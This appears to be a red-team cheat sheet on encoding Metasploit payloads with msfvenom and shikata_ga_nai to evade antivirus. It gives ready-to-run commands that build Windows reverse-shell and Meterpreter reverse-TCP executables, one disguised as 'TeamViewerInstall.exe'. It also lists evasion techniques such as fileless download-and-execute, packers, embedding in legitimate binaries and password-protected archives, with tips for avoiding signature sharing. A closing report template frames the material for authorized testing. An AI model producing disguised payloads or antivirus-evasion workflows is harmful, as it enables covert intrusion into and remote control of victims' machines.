π‘οΈ Methodology Checklist
- Identify target AV engine if possible
- List available encoders:
show encoders - Encode payload:
msfvenom -p [PAYLOAD] -e [ENCODER] -i [ITERATIONS] -f [FORMAT] - x86 target: use
x86/shikata_ga_nai - Test encoded payload against AV (VirusTotal β be careful with operational payloads)
- If still detected: increase iterations or use multiple chained encoders
- Note: encoding alone rarely bypasses modern AV β combine with custom shellcode
π― Operational Context
Use when: Basic AV is flagging msfvenom payloads β apply shikata_ga_nai or other encoders to change binary signature. Think Dumber First: Encoding alone wonβt beat modern EDR. Use 5+ iterations of shikata_ga_nai for basic AV, but combine with Veil or custom shellcode loaders for EDR environments. Test VirusTotal (non-submitting mode) before delivery. Skip when: Target has behavioral EDR β encoding only defeats static signature scanning.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=[TARGET_IP] LPORT=4444 -b "\x00" -f perl | Remove null bytes from payload |
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=[TARGET_IP] LPORT=4444 -b "\x00" -f perl -e x86/shikata_ga_nai | Apply Shikata Ga Nai encoder |
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[TARGET_IP] LPORT=8080 -e x86/shikata_ga_nai -f exe -i 10 -o /root/Desktop/TeamViewerInstall.exe | 10-iteration encoded EXE |
show encoders | List encoders compatible with current module/payload |
msf-virustotal -k [API_KEY] -f [FILENAME].exe | Check payload against VirusTotal |
hashid -j [HASH] | Identify hash type and JtR format |
hashid -m [HASH] | Identify hash type and Hashcat mode |
π¬ Deep Dive & Workflow
Three Reasons to Encode
- Architecture compatibility β ensure payload runs on target CPU (x86, x64, MIPS, etc.)
- Bad character removal β strip opcodes (like null
\x00) that would break the exploit buffer during overflow exploitation - AV evasion (legacy) β historically worked; modern AV has caught up
Shikata Ga Nai (SGN) β Reality Check
βIt cannot be helpedβ β once the gold standard, now widely detected.
| Iterations | Detection Rate |
|---|---|
| 1x SGN | ~54/69 engines on VirusTotal |
| 10x SGN | ~52/65 engines on VirusTotal |
Encoding does NOT reliably bypass modern AV. It may bypass disk-based static scans, but behavioral/memory analysis still catches it at execution time. Use encoding for:
- Removing bad chars from overflow exploits (legitimate use)
- Bypassing older AV / simple hash-based detection
- Never as your only evasion strategy
When Encoding Actually Helps
# Buffer overflow: payload has null bytes that terminate strcpy
# Encoding strips \x00 so the whole payload is copied
msfvenom -p windows/shell_reverse_tcp LHOST=[IP] LPORT=443 -b "\x00" -f cBetter Evasion Alternatives
| Technique | Method |
|---|---|
| Fileless execution | IEX DownloadString (never hits disk) |
| Executable templates | -x flag (embed in legit binary) |
| Custom shellcode | Manual assembly modification |
| Packers | UPX, Themida, Enigma Protector |
| Archive + password | Password-protected RAR β evades auto-scan |
show encoders β Context-Aware Filtering
Inside an active exploit module, show encoders only displays encoders compatible with your current target architecture and payload. If targeting x64, x86 encoders wonβt appear.
Using msf-virustotal
msf-virustotal -k <your_API_key> -f encoded_shell.exe
# Output: Analysis Report: encoded_shell.exe (51 / 68)Requires a free VirusTotal API key. Useful for quick pre-engagement AV testing without leaving msfconsole.
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| shikata_ga_nai encoder returns error | x86 payload required for this encoder | Ensure payload is x86 not x64; shikata_ga_nai is x86-only |
| Encoded payload still detected | Single encoding pass insufficient | Increase iterations: -i 10; combine with custom obfuscation wrapper |
| Encoded EXE wonβt run on target | Decoder stub crashes | Architecture mismatch β verify target is x86 or use x64-compatible encoder |
| No matching encoders for payload | Platform/arch filter | Run msfvenom --list encoders and filter by compat: msfvenom -p [PAYLOAD] --list-encoders |
| VirusTotal scan shows high detection | Signature in decoder stub | Avoid VirusTotal uploads β use offline scanning with ClamAV or Windows Defender locally |
π Reporting Trigger
Finding Title: Encoded Payload Bypasses Signature-Based AV Detection Impact: Payload encoding changes binary signatures to evade static AV scanning, enabling payload delivery to endpoints protected by signature-based antivirus without triggering quarantine. Root Cause: AV solution relies on static signature matching without behavioral analysis. No sandbox detonation for unknown executables. Recommendation: Upgrade to behavioral EDR solution. Implement sandbox detonation for all downloaded executables. Disable legacy antivirus-only products in favor of next-generation EDR.